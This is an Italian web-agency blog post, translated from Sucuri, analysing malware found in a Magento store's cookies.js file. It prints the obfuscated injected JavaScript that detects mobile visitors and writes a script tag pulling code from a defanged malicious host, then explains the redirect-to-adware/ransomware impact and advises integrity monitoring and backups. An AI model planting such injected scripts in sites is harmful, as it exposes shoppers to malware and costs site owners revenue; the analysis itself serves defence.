• Passa alla navigazione primaria
  • Passa al contenuto principale
  • Passa al piè di pagina
Fedegrafia, marketing digitale

Creazione siti web Pordenone e Udine

Consulenza Seo e Web Marketing

  • Home
  • Servizi
    • Siti internet
      • Realizzazione siti web
      • Consulenza seo
      • Sicurezza siti web
      • Newsletter
      • Gestione sito web
      • Assistenza siti – email
      • Grafica Facebook
    • Grafica e Stampa
      • Prodotti di stampa
      • Offerta biglietti
    • Fotografia
      • Stampe fotografiche
      • Servizi fotografici
    • Corsi e lezioni
    • Video e Droni
  • Lavori
  • Chi sono
  • Contatti
    • Prenota appuntamento
  • Preventivi
  • News

Malware smartphone colpisce siti ed utenti ecommerce

Un malware mobile è un software dannoso che mira a telefoni cellulari / smartphone, tablet e dispositivi simili. Gli attacchi possono variare da danneggiamenti fatali all'OS (cd. bricking) alla perdita di informazioni sensibili e personali, come carte di credito, password salvate, immagini e molto altro ancora.

29 Agosto 2017 a cura di Federico Benvenuto Lascia un commento

Traduzione autorizzata da Sucuri che detiene il copyright dell’articolo. Leggi l’articolo originale (in Inglese)

Un malware mobile è un software dannoso che mira a telefoni cellulari / smartphone, tablet e dispositivi simili. Gli attacchi possono variare da danneggiamenti fatali all’OS (cd. bricking) alla perdita di informazioni sensibili e personali, come carte di credito, password salvate, immagini e molto altro ancora.

Hai problemi di malware nel tuo ecommerce?

chiama 339 848 3250

Con la costante crescita degli utenti mobili, gli attaccanti stanno concentrando i loro sforzi sullo sviluppo di malware mirati a questi dispositivi. In questo articolo descriveremo come Sucuri abbia rilevato un attacco interessante contro una piattaforma di ecommerce.

Durante una ricerca sull’incidente, Sucuri ha identificato un codice dannoso in un’installazione di Magento che si trova nel file “./js/mage/cookies.js”. Ecco parte dello snippet:

var _$_f51c = [“userAgent”, “vendor”, “opera”, “test”, “substr”, “<script type=\”text/javascript\” src=\”hxxp://Malicious-URL-REMOVED.com/odessa/?md2\”></script>”, “write”];

function isMobile() {
var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);
if (/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || )) {
return true
};
return false
}
if (isMobile() === true) {
document[_$_f51c[6]](_$_f51c[5])
}

La funzione isMobile () controlla se il visitatore utilizza uno degli elenchi predefiniti di smartphone / tablet e se corrisponde, l’utente verrà reindirizzato ad altri siti maligni.

Questi altri siti web richiederanno l’installazione di software di terze parti che richiedono di pulire o velocizzare dispositivi mobili, barre degli strumenti, adware o addirittura peggio, URL dannosi che distribuiscono ransomware che bloccheranno il dispositivo e lo faranno ostaggio fino a quando verrà pagato un importo X di denaro all’attaccante via bitcoin.

A seconda della campagna dell’attaccante, possono anche reindirizzare i visitatori o i potenziali acquirenti ai siti web concorrenti, causando così un enorme impatto sui redditi del proprietario del sito. Tieni presente che questi attacchi non sono limitati ai siti Web di Magento, perché potrebbero essere destinati a WordPress, Joomla, OpenCart, Prestashop e altre piattaforme diverse.

Per individuare e prevenire queste problematiche, ti consigliamo di installare un sistema di monitoraggio dell’integrità dei file e di avere dei backup dei file / database a disposizione. Se il tuo ambiente è compromesso, sarai in grado di identificare e tempestivamente ripristinare i file per evitare ulteriori danni alla tua presenza online e SEO.

Articolo di Moe Obaid,  Sucuri

Sicurezza

Interazioni del lettore

Lascia un commento Annulla risposta

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

Lavoriamo insieme

Contattaci e affidaci il tuo progetto digitale.

Contattaci

Footer

Siti Internet, Consulenza SEO, Newsletter

Federico Benvenuto

Socio Collaboratore
Nuove Tecniche - Società cooperativa
Sede operativa:
Via Roveredo, 20 – 33170 Pordenone, FVG
@ Polo Tecnologico Alto Adriatico
Sede legale:
Viale Grigoletti, 72/e – 33170 Pordenone
Telefono: 339 848 3250
C.F./P.IVA: 01534330939 REA PN - 84323

ARGOMENTI

  • 8 cose da fare dopo aver ripulito il tuo sito dal malware
  • Dati obbligatori sito internet
  • WooCommerce Vulnerabilità critica – SQL Injection
  • Guida sicurezza siti Ecommerce
  • Aggiornamento WP 5.5.2
  • Vulnerabilità malware Yuzo Related Post: compromessi molti siti WordPress

CERCA

Tutte le immagini presentate in questo sito sono soggette a copyright e non possono essere usate senza una esplicita autorizzazione scritta del titolare dei dati.

Fedegrafia
Marketing digitale

Siti web WordPress e grafica

Via Costantini, 1 33079
Sesto al Reghena,
FVG

Telefono: 339 848 3250

Copyright © 2023 - Copyright Fedegrafia.com - Privacy - Informativa Cookies - dove siamo